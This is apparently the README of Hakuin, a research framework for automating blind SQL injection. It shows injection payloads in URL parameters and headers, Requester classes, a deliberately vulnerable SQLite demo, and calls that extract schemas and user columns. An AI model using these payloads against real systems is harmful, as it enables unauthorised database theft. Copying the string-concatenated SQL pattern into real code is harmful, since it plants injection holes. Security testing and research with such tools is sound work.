<p align="center">
<img width="150" src="https://raw.githubusercontent.com/pruzko/hakuin/main/logo.png">
</p>

Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, such as pre-trained and adaptive language models, opportunistic guessing, parallelism and more.

Hakuin has been presented at esteemed academic and industrial conferences:
- [BlackHat MEA, Riyadh](https://blackhatmea.com/session/hakuin-injecting-brain-blind-sql-injection), 2023
- [Hack in the Box, Phuket](https://conference.hitb.org/hitbsecconf2023hkt/session/hakuin-injecting-brains-into-blind-sql-injection/), 2023
- [IEEE S&P Workshop on Offensive Technologies (WOOT)](https://wootconference.org/papers/woot23-paper17.pdf), 2023

More information can be found in our [paper](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_WOOT_23.pdf) and [slides](https://github.com/pruzko/hakuin/blob/main/publications/Hakuin_HITB_23.pdf).

## Installation
To install Hakuin, simply run:
```
pip3 install hakuin
```
Developers should install the package locally and set the `-e` flag for editable mode:
```
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
```
## Examples
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from `Requester` and override its `request` method. The method must also determine whether the query resolved to `True` or `False` and return the result.

##### Example 1 - Query Parameter Injection with Status-based Inference
```python
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # aiohttp has no module-level get(); requests go through a ClientSession
        url = f'http://vuln.com/?n=XXX" OR ({query}) --'
        async with aiohttp.ClientSession() as session:
            async with session.get(url) as r:
                # the query resolved to True if the server answered with 200
                return r.status == 200
```
##### Example 2 - Header Injection with Content-based Inference
```python
import aiohttp
from hakuin import Requester

class ContentRequester(Requester):
    async def request(self, ctx, query):
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                # the query resolved to True if the page contains 'found'
                return 'found' in await r.text()
```
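To see what a `request` method ultimately has to return, it can help to simulate a vulnerable application locally. The following is a minimal sketch that does not use Hakuin at all: `FakeVulnerableApp`, `lookup`, and `oracle` are hypothetical names, and an in-memory SQLite database stands in for the target. It mimics the status-based inference from Example 1 by treating "a row was returned" as status 200 and anything else as 404.

```python
import asyncio
import sqlite3


class FakeVulnerableApp:
    """Hypothetical stand-in for a web app that builds SQL by string concatenation."""

    def __init__(self):
        self.db = sqlite3.connect(':memory:')
        self.db.execute('CREATE TABLE products (name TEXT)')
        self.db.execute("INSERT INTO products VALUES ('book')")
        self.db.execute('CREATE TABLE users (username TEXT)')
        self.db.execute("INSERT INTO users VALUES ('admin')")

    def lookup(self, n):
        # Vulnerable on purpose: user input is pasted directly into the statement.
        sql = f"SELECT name FROM products WHERE name = '{n}'"
        rows = self.db.execute(sql).fetchall()
        return 200 if rows else 404


async def oracle(app, query):
    # Same idea as a Requester's request method:
    # inject the query, then reduce the response to a bool.
    payload = f"XXX' OR ({query}) --"
    return app.lookup(payload) == 200


async def main():
    app = FakeVulnerableApp()
    is_a = await oracle(app, "SELECT substr(username, 1, 1) = 'a' FROM users LIMIT 1")
    is_b = await oracle(app, "SELECT substr(username, 1, 1) = 'b' FROM users LIMIT 1")
    return is_a, is_b


print(asyncio.run(main()))  # (True, False)
```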
To start extracting data, use the `Extractor` class. It requires a `DBMS` object to construct queries and a `Requester` object to inject them. Hakuin currently supports the `SQLite`, `MySQL`, `PSQL` (PostgreSQL), and `MSSQL` (SQL Server) DBMSs, and support for more is planned. If you wish to support another DBMS, implement the `DBMS` interface defined in `hakuin/dbms/DBMS.py`.
##### Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
```python
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms: Use this DBMS
    # n_tasks: Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.run(main())
```
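The `n_tasks` parameter spawns tasks that extract column rows in parallel. The sketch below illustrates that general pattern with plain `asyncio`. It is not Hakuin's implementation: `extract_row`, `worker`, and `extract_rows` are hypothetical names, and the `asyncio.sleep` call is a placeholder for the many requests needed to infer one row.

```python
import asyncio


async def extract_row(row_idx, delay=0.01):
    # Placeholder for the requests needed to infer a single row.
    await asyncio.sleep(delay)
    return f'row-{row_idx}'


async def worker(queue, results):
    # Each task keeps pulling row indices until the queue is drained.
    while True:
        try:
            row_idx = queue.get_nowait()
        except asyncio.QueueEmpty:
            return
        results[row_idx] = await extract_row(row_idx)


async def extract_rows(n_rows, n_tasks):
    queue = asyncio.Queue()
    for row_idx in range(n_rows):
        queue.put_nowait(row_idx)

    # Results are stored by index, so row order is preserved
    # no matter which task finishes first.
    results = [None] * n_rows
    await asyncio.gather(*(worker(queue, results) for _ in range(n_tasks)))
    return results


rows = asyncio.run(extract_rows(n_rows=5, n_tasks=3))
print(rows)
```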
Now that everything is set, you can start extracting DB schemas.
##### Example 1 - Extracting DB Schemas
```python
# strategy:
#   'binary':   Use binary search
#   'model':    Use pre-trained models
schema = await ext.extract_schema(strategy='model')
```
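For intuition about the `'binary'` strategy, here is a minimal, Hakuin-independent sketch of binary search over a yes/no oracle. The names `infer_char` and `infer_string` are hypothetical, the oracle is a local lambda rather than an injected query, and the string length is assumed to be known, which a real extraction would have to infer as well.

```python
def infer_char(oracle, lo=0, hi=127):
    """Find a code point in [lo, hi] using only yes/no questions."""
    requests = 0
    while lo < hi:
        mid = (lo + hi) // 2
        requests += 1
        if oracle(mid):      # "is the character's code <= mid?"
            hi = mid
        else:
            lo = mid + 1
    return chr(lo), requests


def infer_string(secret):
    """Recover an ASCII string one character at a time and count the questions."""
    chars, total = [], 0
    for ch in secret:
        # Local stand-in for the target: each call represents one request.
        found, requests = infer_char(lambda mid, ch=ch: ord(ch) <= mid)
        chars.append(found)
        total += requests
    return ''.join(chars), total
```

With a 128-symbol alphabet, every character costs exactly seven questions, so `infer_string('users')` returns `('users', 35)`.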
##### Example 2 - Extracting only Table/Column Names
```python
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
```
Once you know the schema, you can extract the actual content.
##### Example 1 - Extracting Generic Columns
```python
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
```
##### Example 2 - Extracting Textual Columns
```python
# strategy:
#   'binary':   Use binary search
#   'fivegram': Use five-gram model
#   'unigram':  Use unigram model
#   'dynamic':  Dynamically identify the best strategy. This setting
#               also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
```
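The model-based strategies aim to spend fewer requests on likely characters. How Hakuin actually uses its models is described in the paper. The sketch below is only a toy illustration of the idea, assuming a unigram model built from strings that are already known and a simple "is it X?" guessing loop. `train_unigram` and `guess_char` are hypothetical names, and the equality check stands in for one injected query.

```python
from collections import Counter


def train_unigram(samples):
    """Count how often each character appears in already-known strings."""
    return Counter(''.join(samples))


def guess_char(secret_char, model, alphabet):
    """Ask 'is it X?' for candidates in descending model frequency."""
    # sorted() is stable, so characters the model has never seen
    # keep their alphabet order at the end of the candidate list.
    candidates = sorted(alphabet, key=lambda c: -model[c])
    for requests, cand in enumerate(candidates, start=1):
        if cand == secret_char:   # stands in for one yes/no request
            return cand, requests
    raise ValueError('character not in alphabet')
```

Frequent characters are found after one or two questions, while rare ones can cost far more than the seven questions of a binary search over ASCII. That trade-off is one reason a setting that picks the strategy dynamically is useful.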
##### Example 3 - Extracting Integer Columns
```python
res = await ext.extract_column_int(table='users', column='id')
```
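Unlike characters, integers have no fixed upper bound, so a blind search has to find one first. The following sketch shows one common approach, exponential search followed by binary search, for non-negative values. It is an illustration under those assumptions and not necessarily what `extract_column_int` does internally. `infer_int` is a hypothetical name, and the oracle answers "is the value less than n?".

```python
def infer_int(oracle):
    """Recover a non-negative integer using only 'is value < n?' questions."""
    requests = 0

    # Phase 1: double the upper bound until it exceeds the value.
    hi = 1
    while True:
        requests += 1
        if oracle(hi):
            break
        hi *= 2
    lo = hi // 2 if hi > 1 else 0

    # Phase 2: binary search in [lo, hi), keeping lo <= value < hi.
    while hi - lo > 1:
        mid = (lo + hi) // 2
        requests += 1
        if oracle(mid):   # value < mid
            hi = mid
        else:
            lo = mid
    return lo, requests
```

For example, `infer_int(lambda n: 5 < n)` returns `(5, 6)`: four questions to find the bound 8, then two to narrow the range down to 5.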
##### Example 4 - Extracting Float Columns
```python
res = await ext.extract_column_float(table='products', column='price')
```
##### Example 5 - Extracting Blob (Binary Data) Columns
```python
res = await ext.extract_column_blob(table='users', column='id')
```
More examples can be found in the `tests` directory.
## Using Hakuin from the Command Line
Hakuin comes with a simple wrapper tool, `hk.py`, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
```
python3 hk.py -h
```
## For Researchers
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the [frozen version](https://zenodo.org/record/7804243), which contains the original code, experiment scripts, and an instruction manual for reproducing the results.
#### Cite Hakuin
```
@inproceedings{hakuin_bsqli,
  title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
  author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
  booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
  pages={384--393},
  year={2023},
  organization={IEEE}
}
```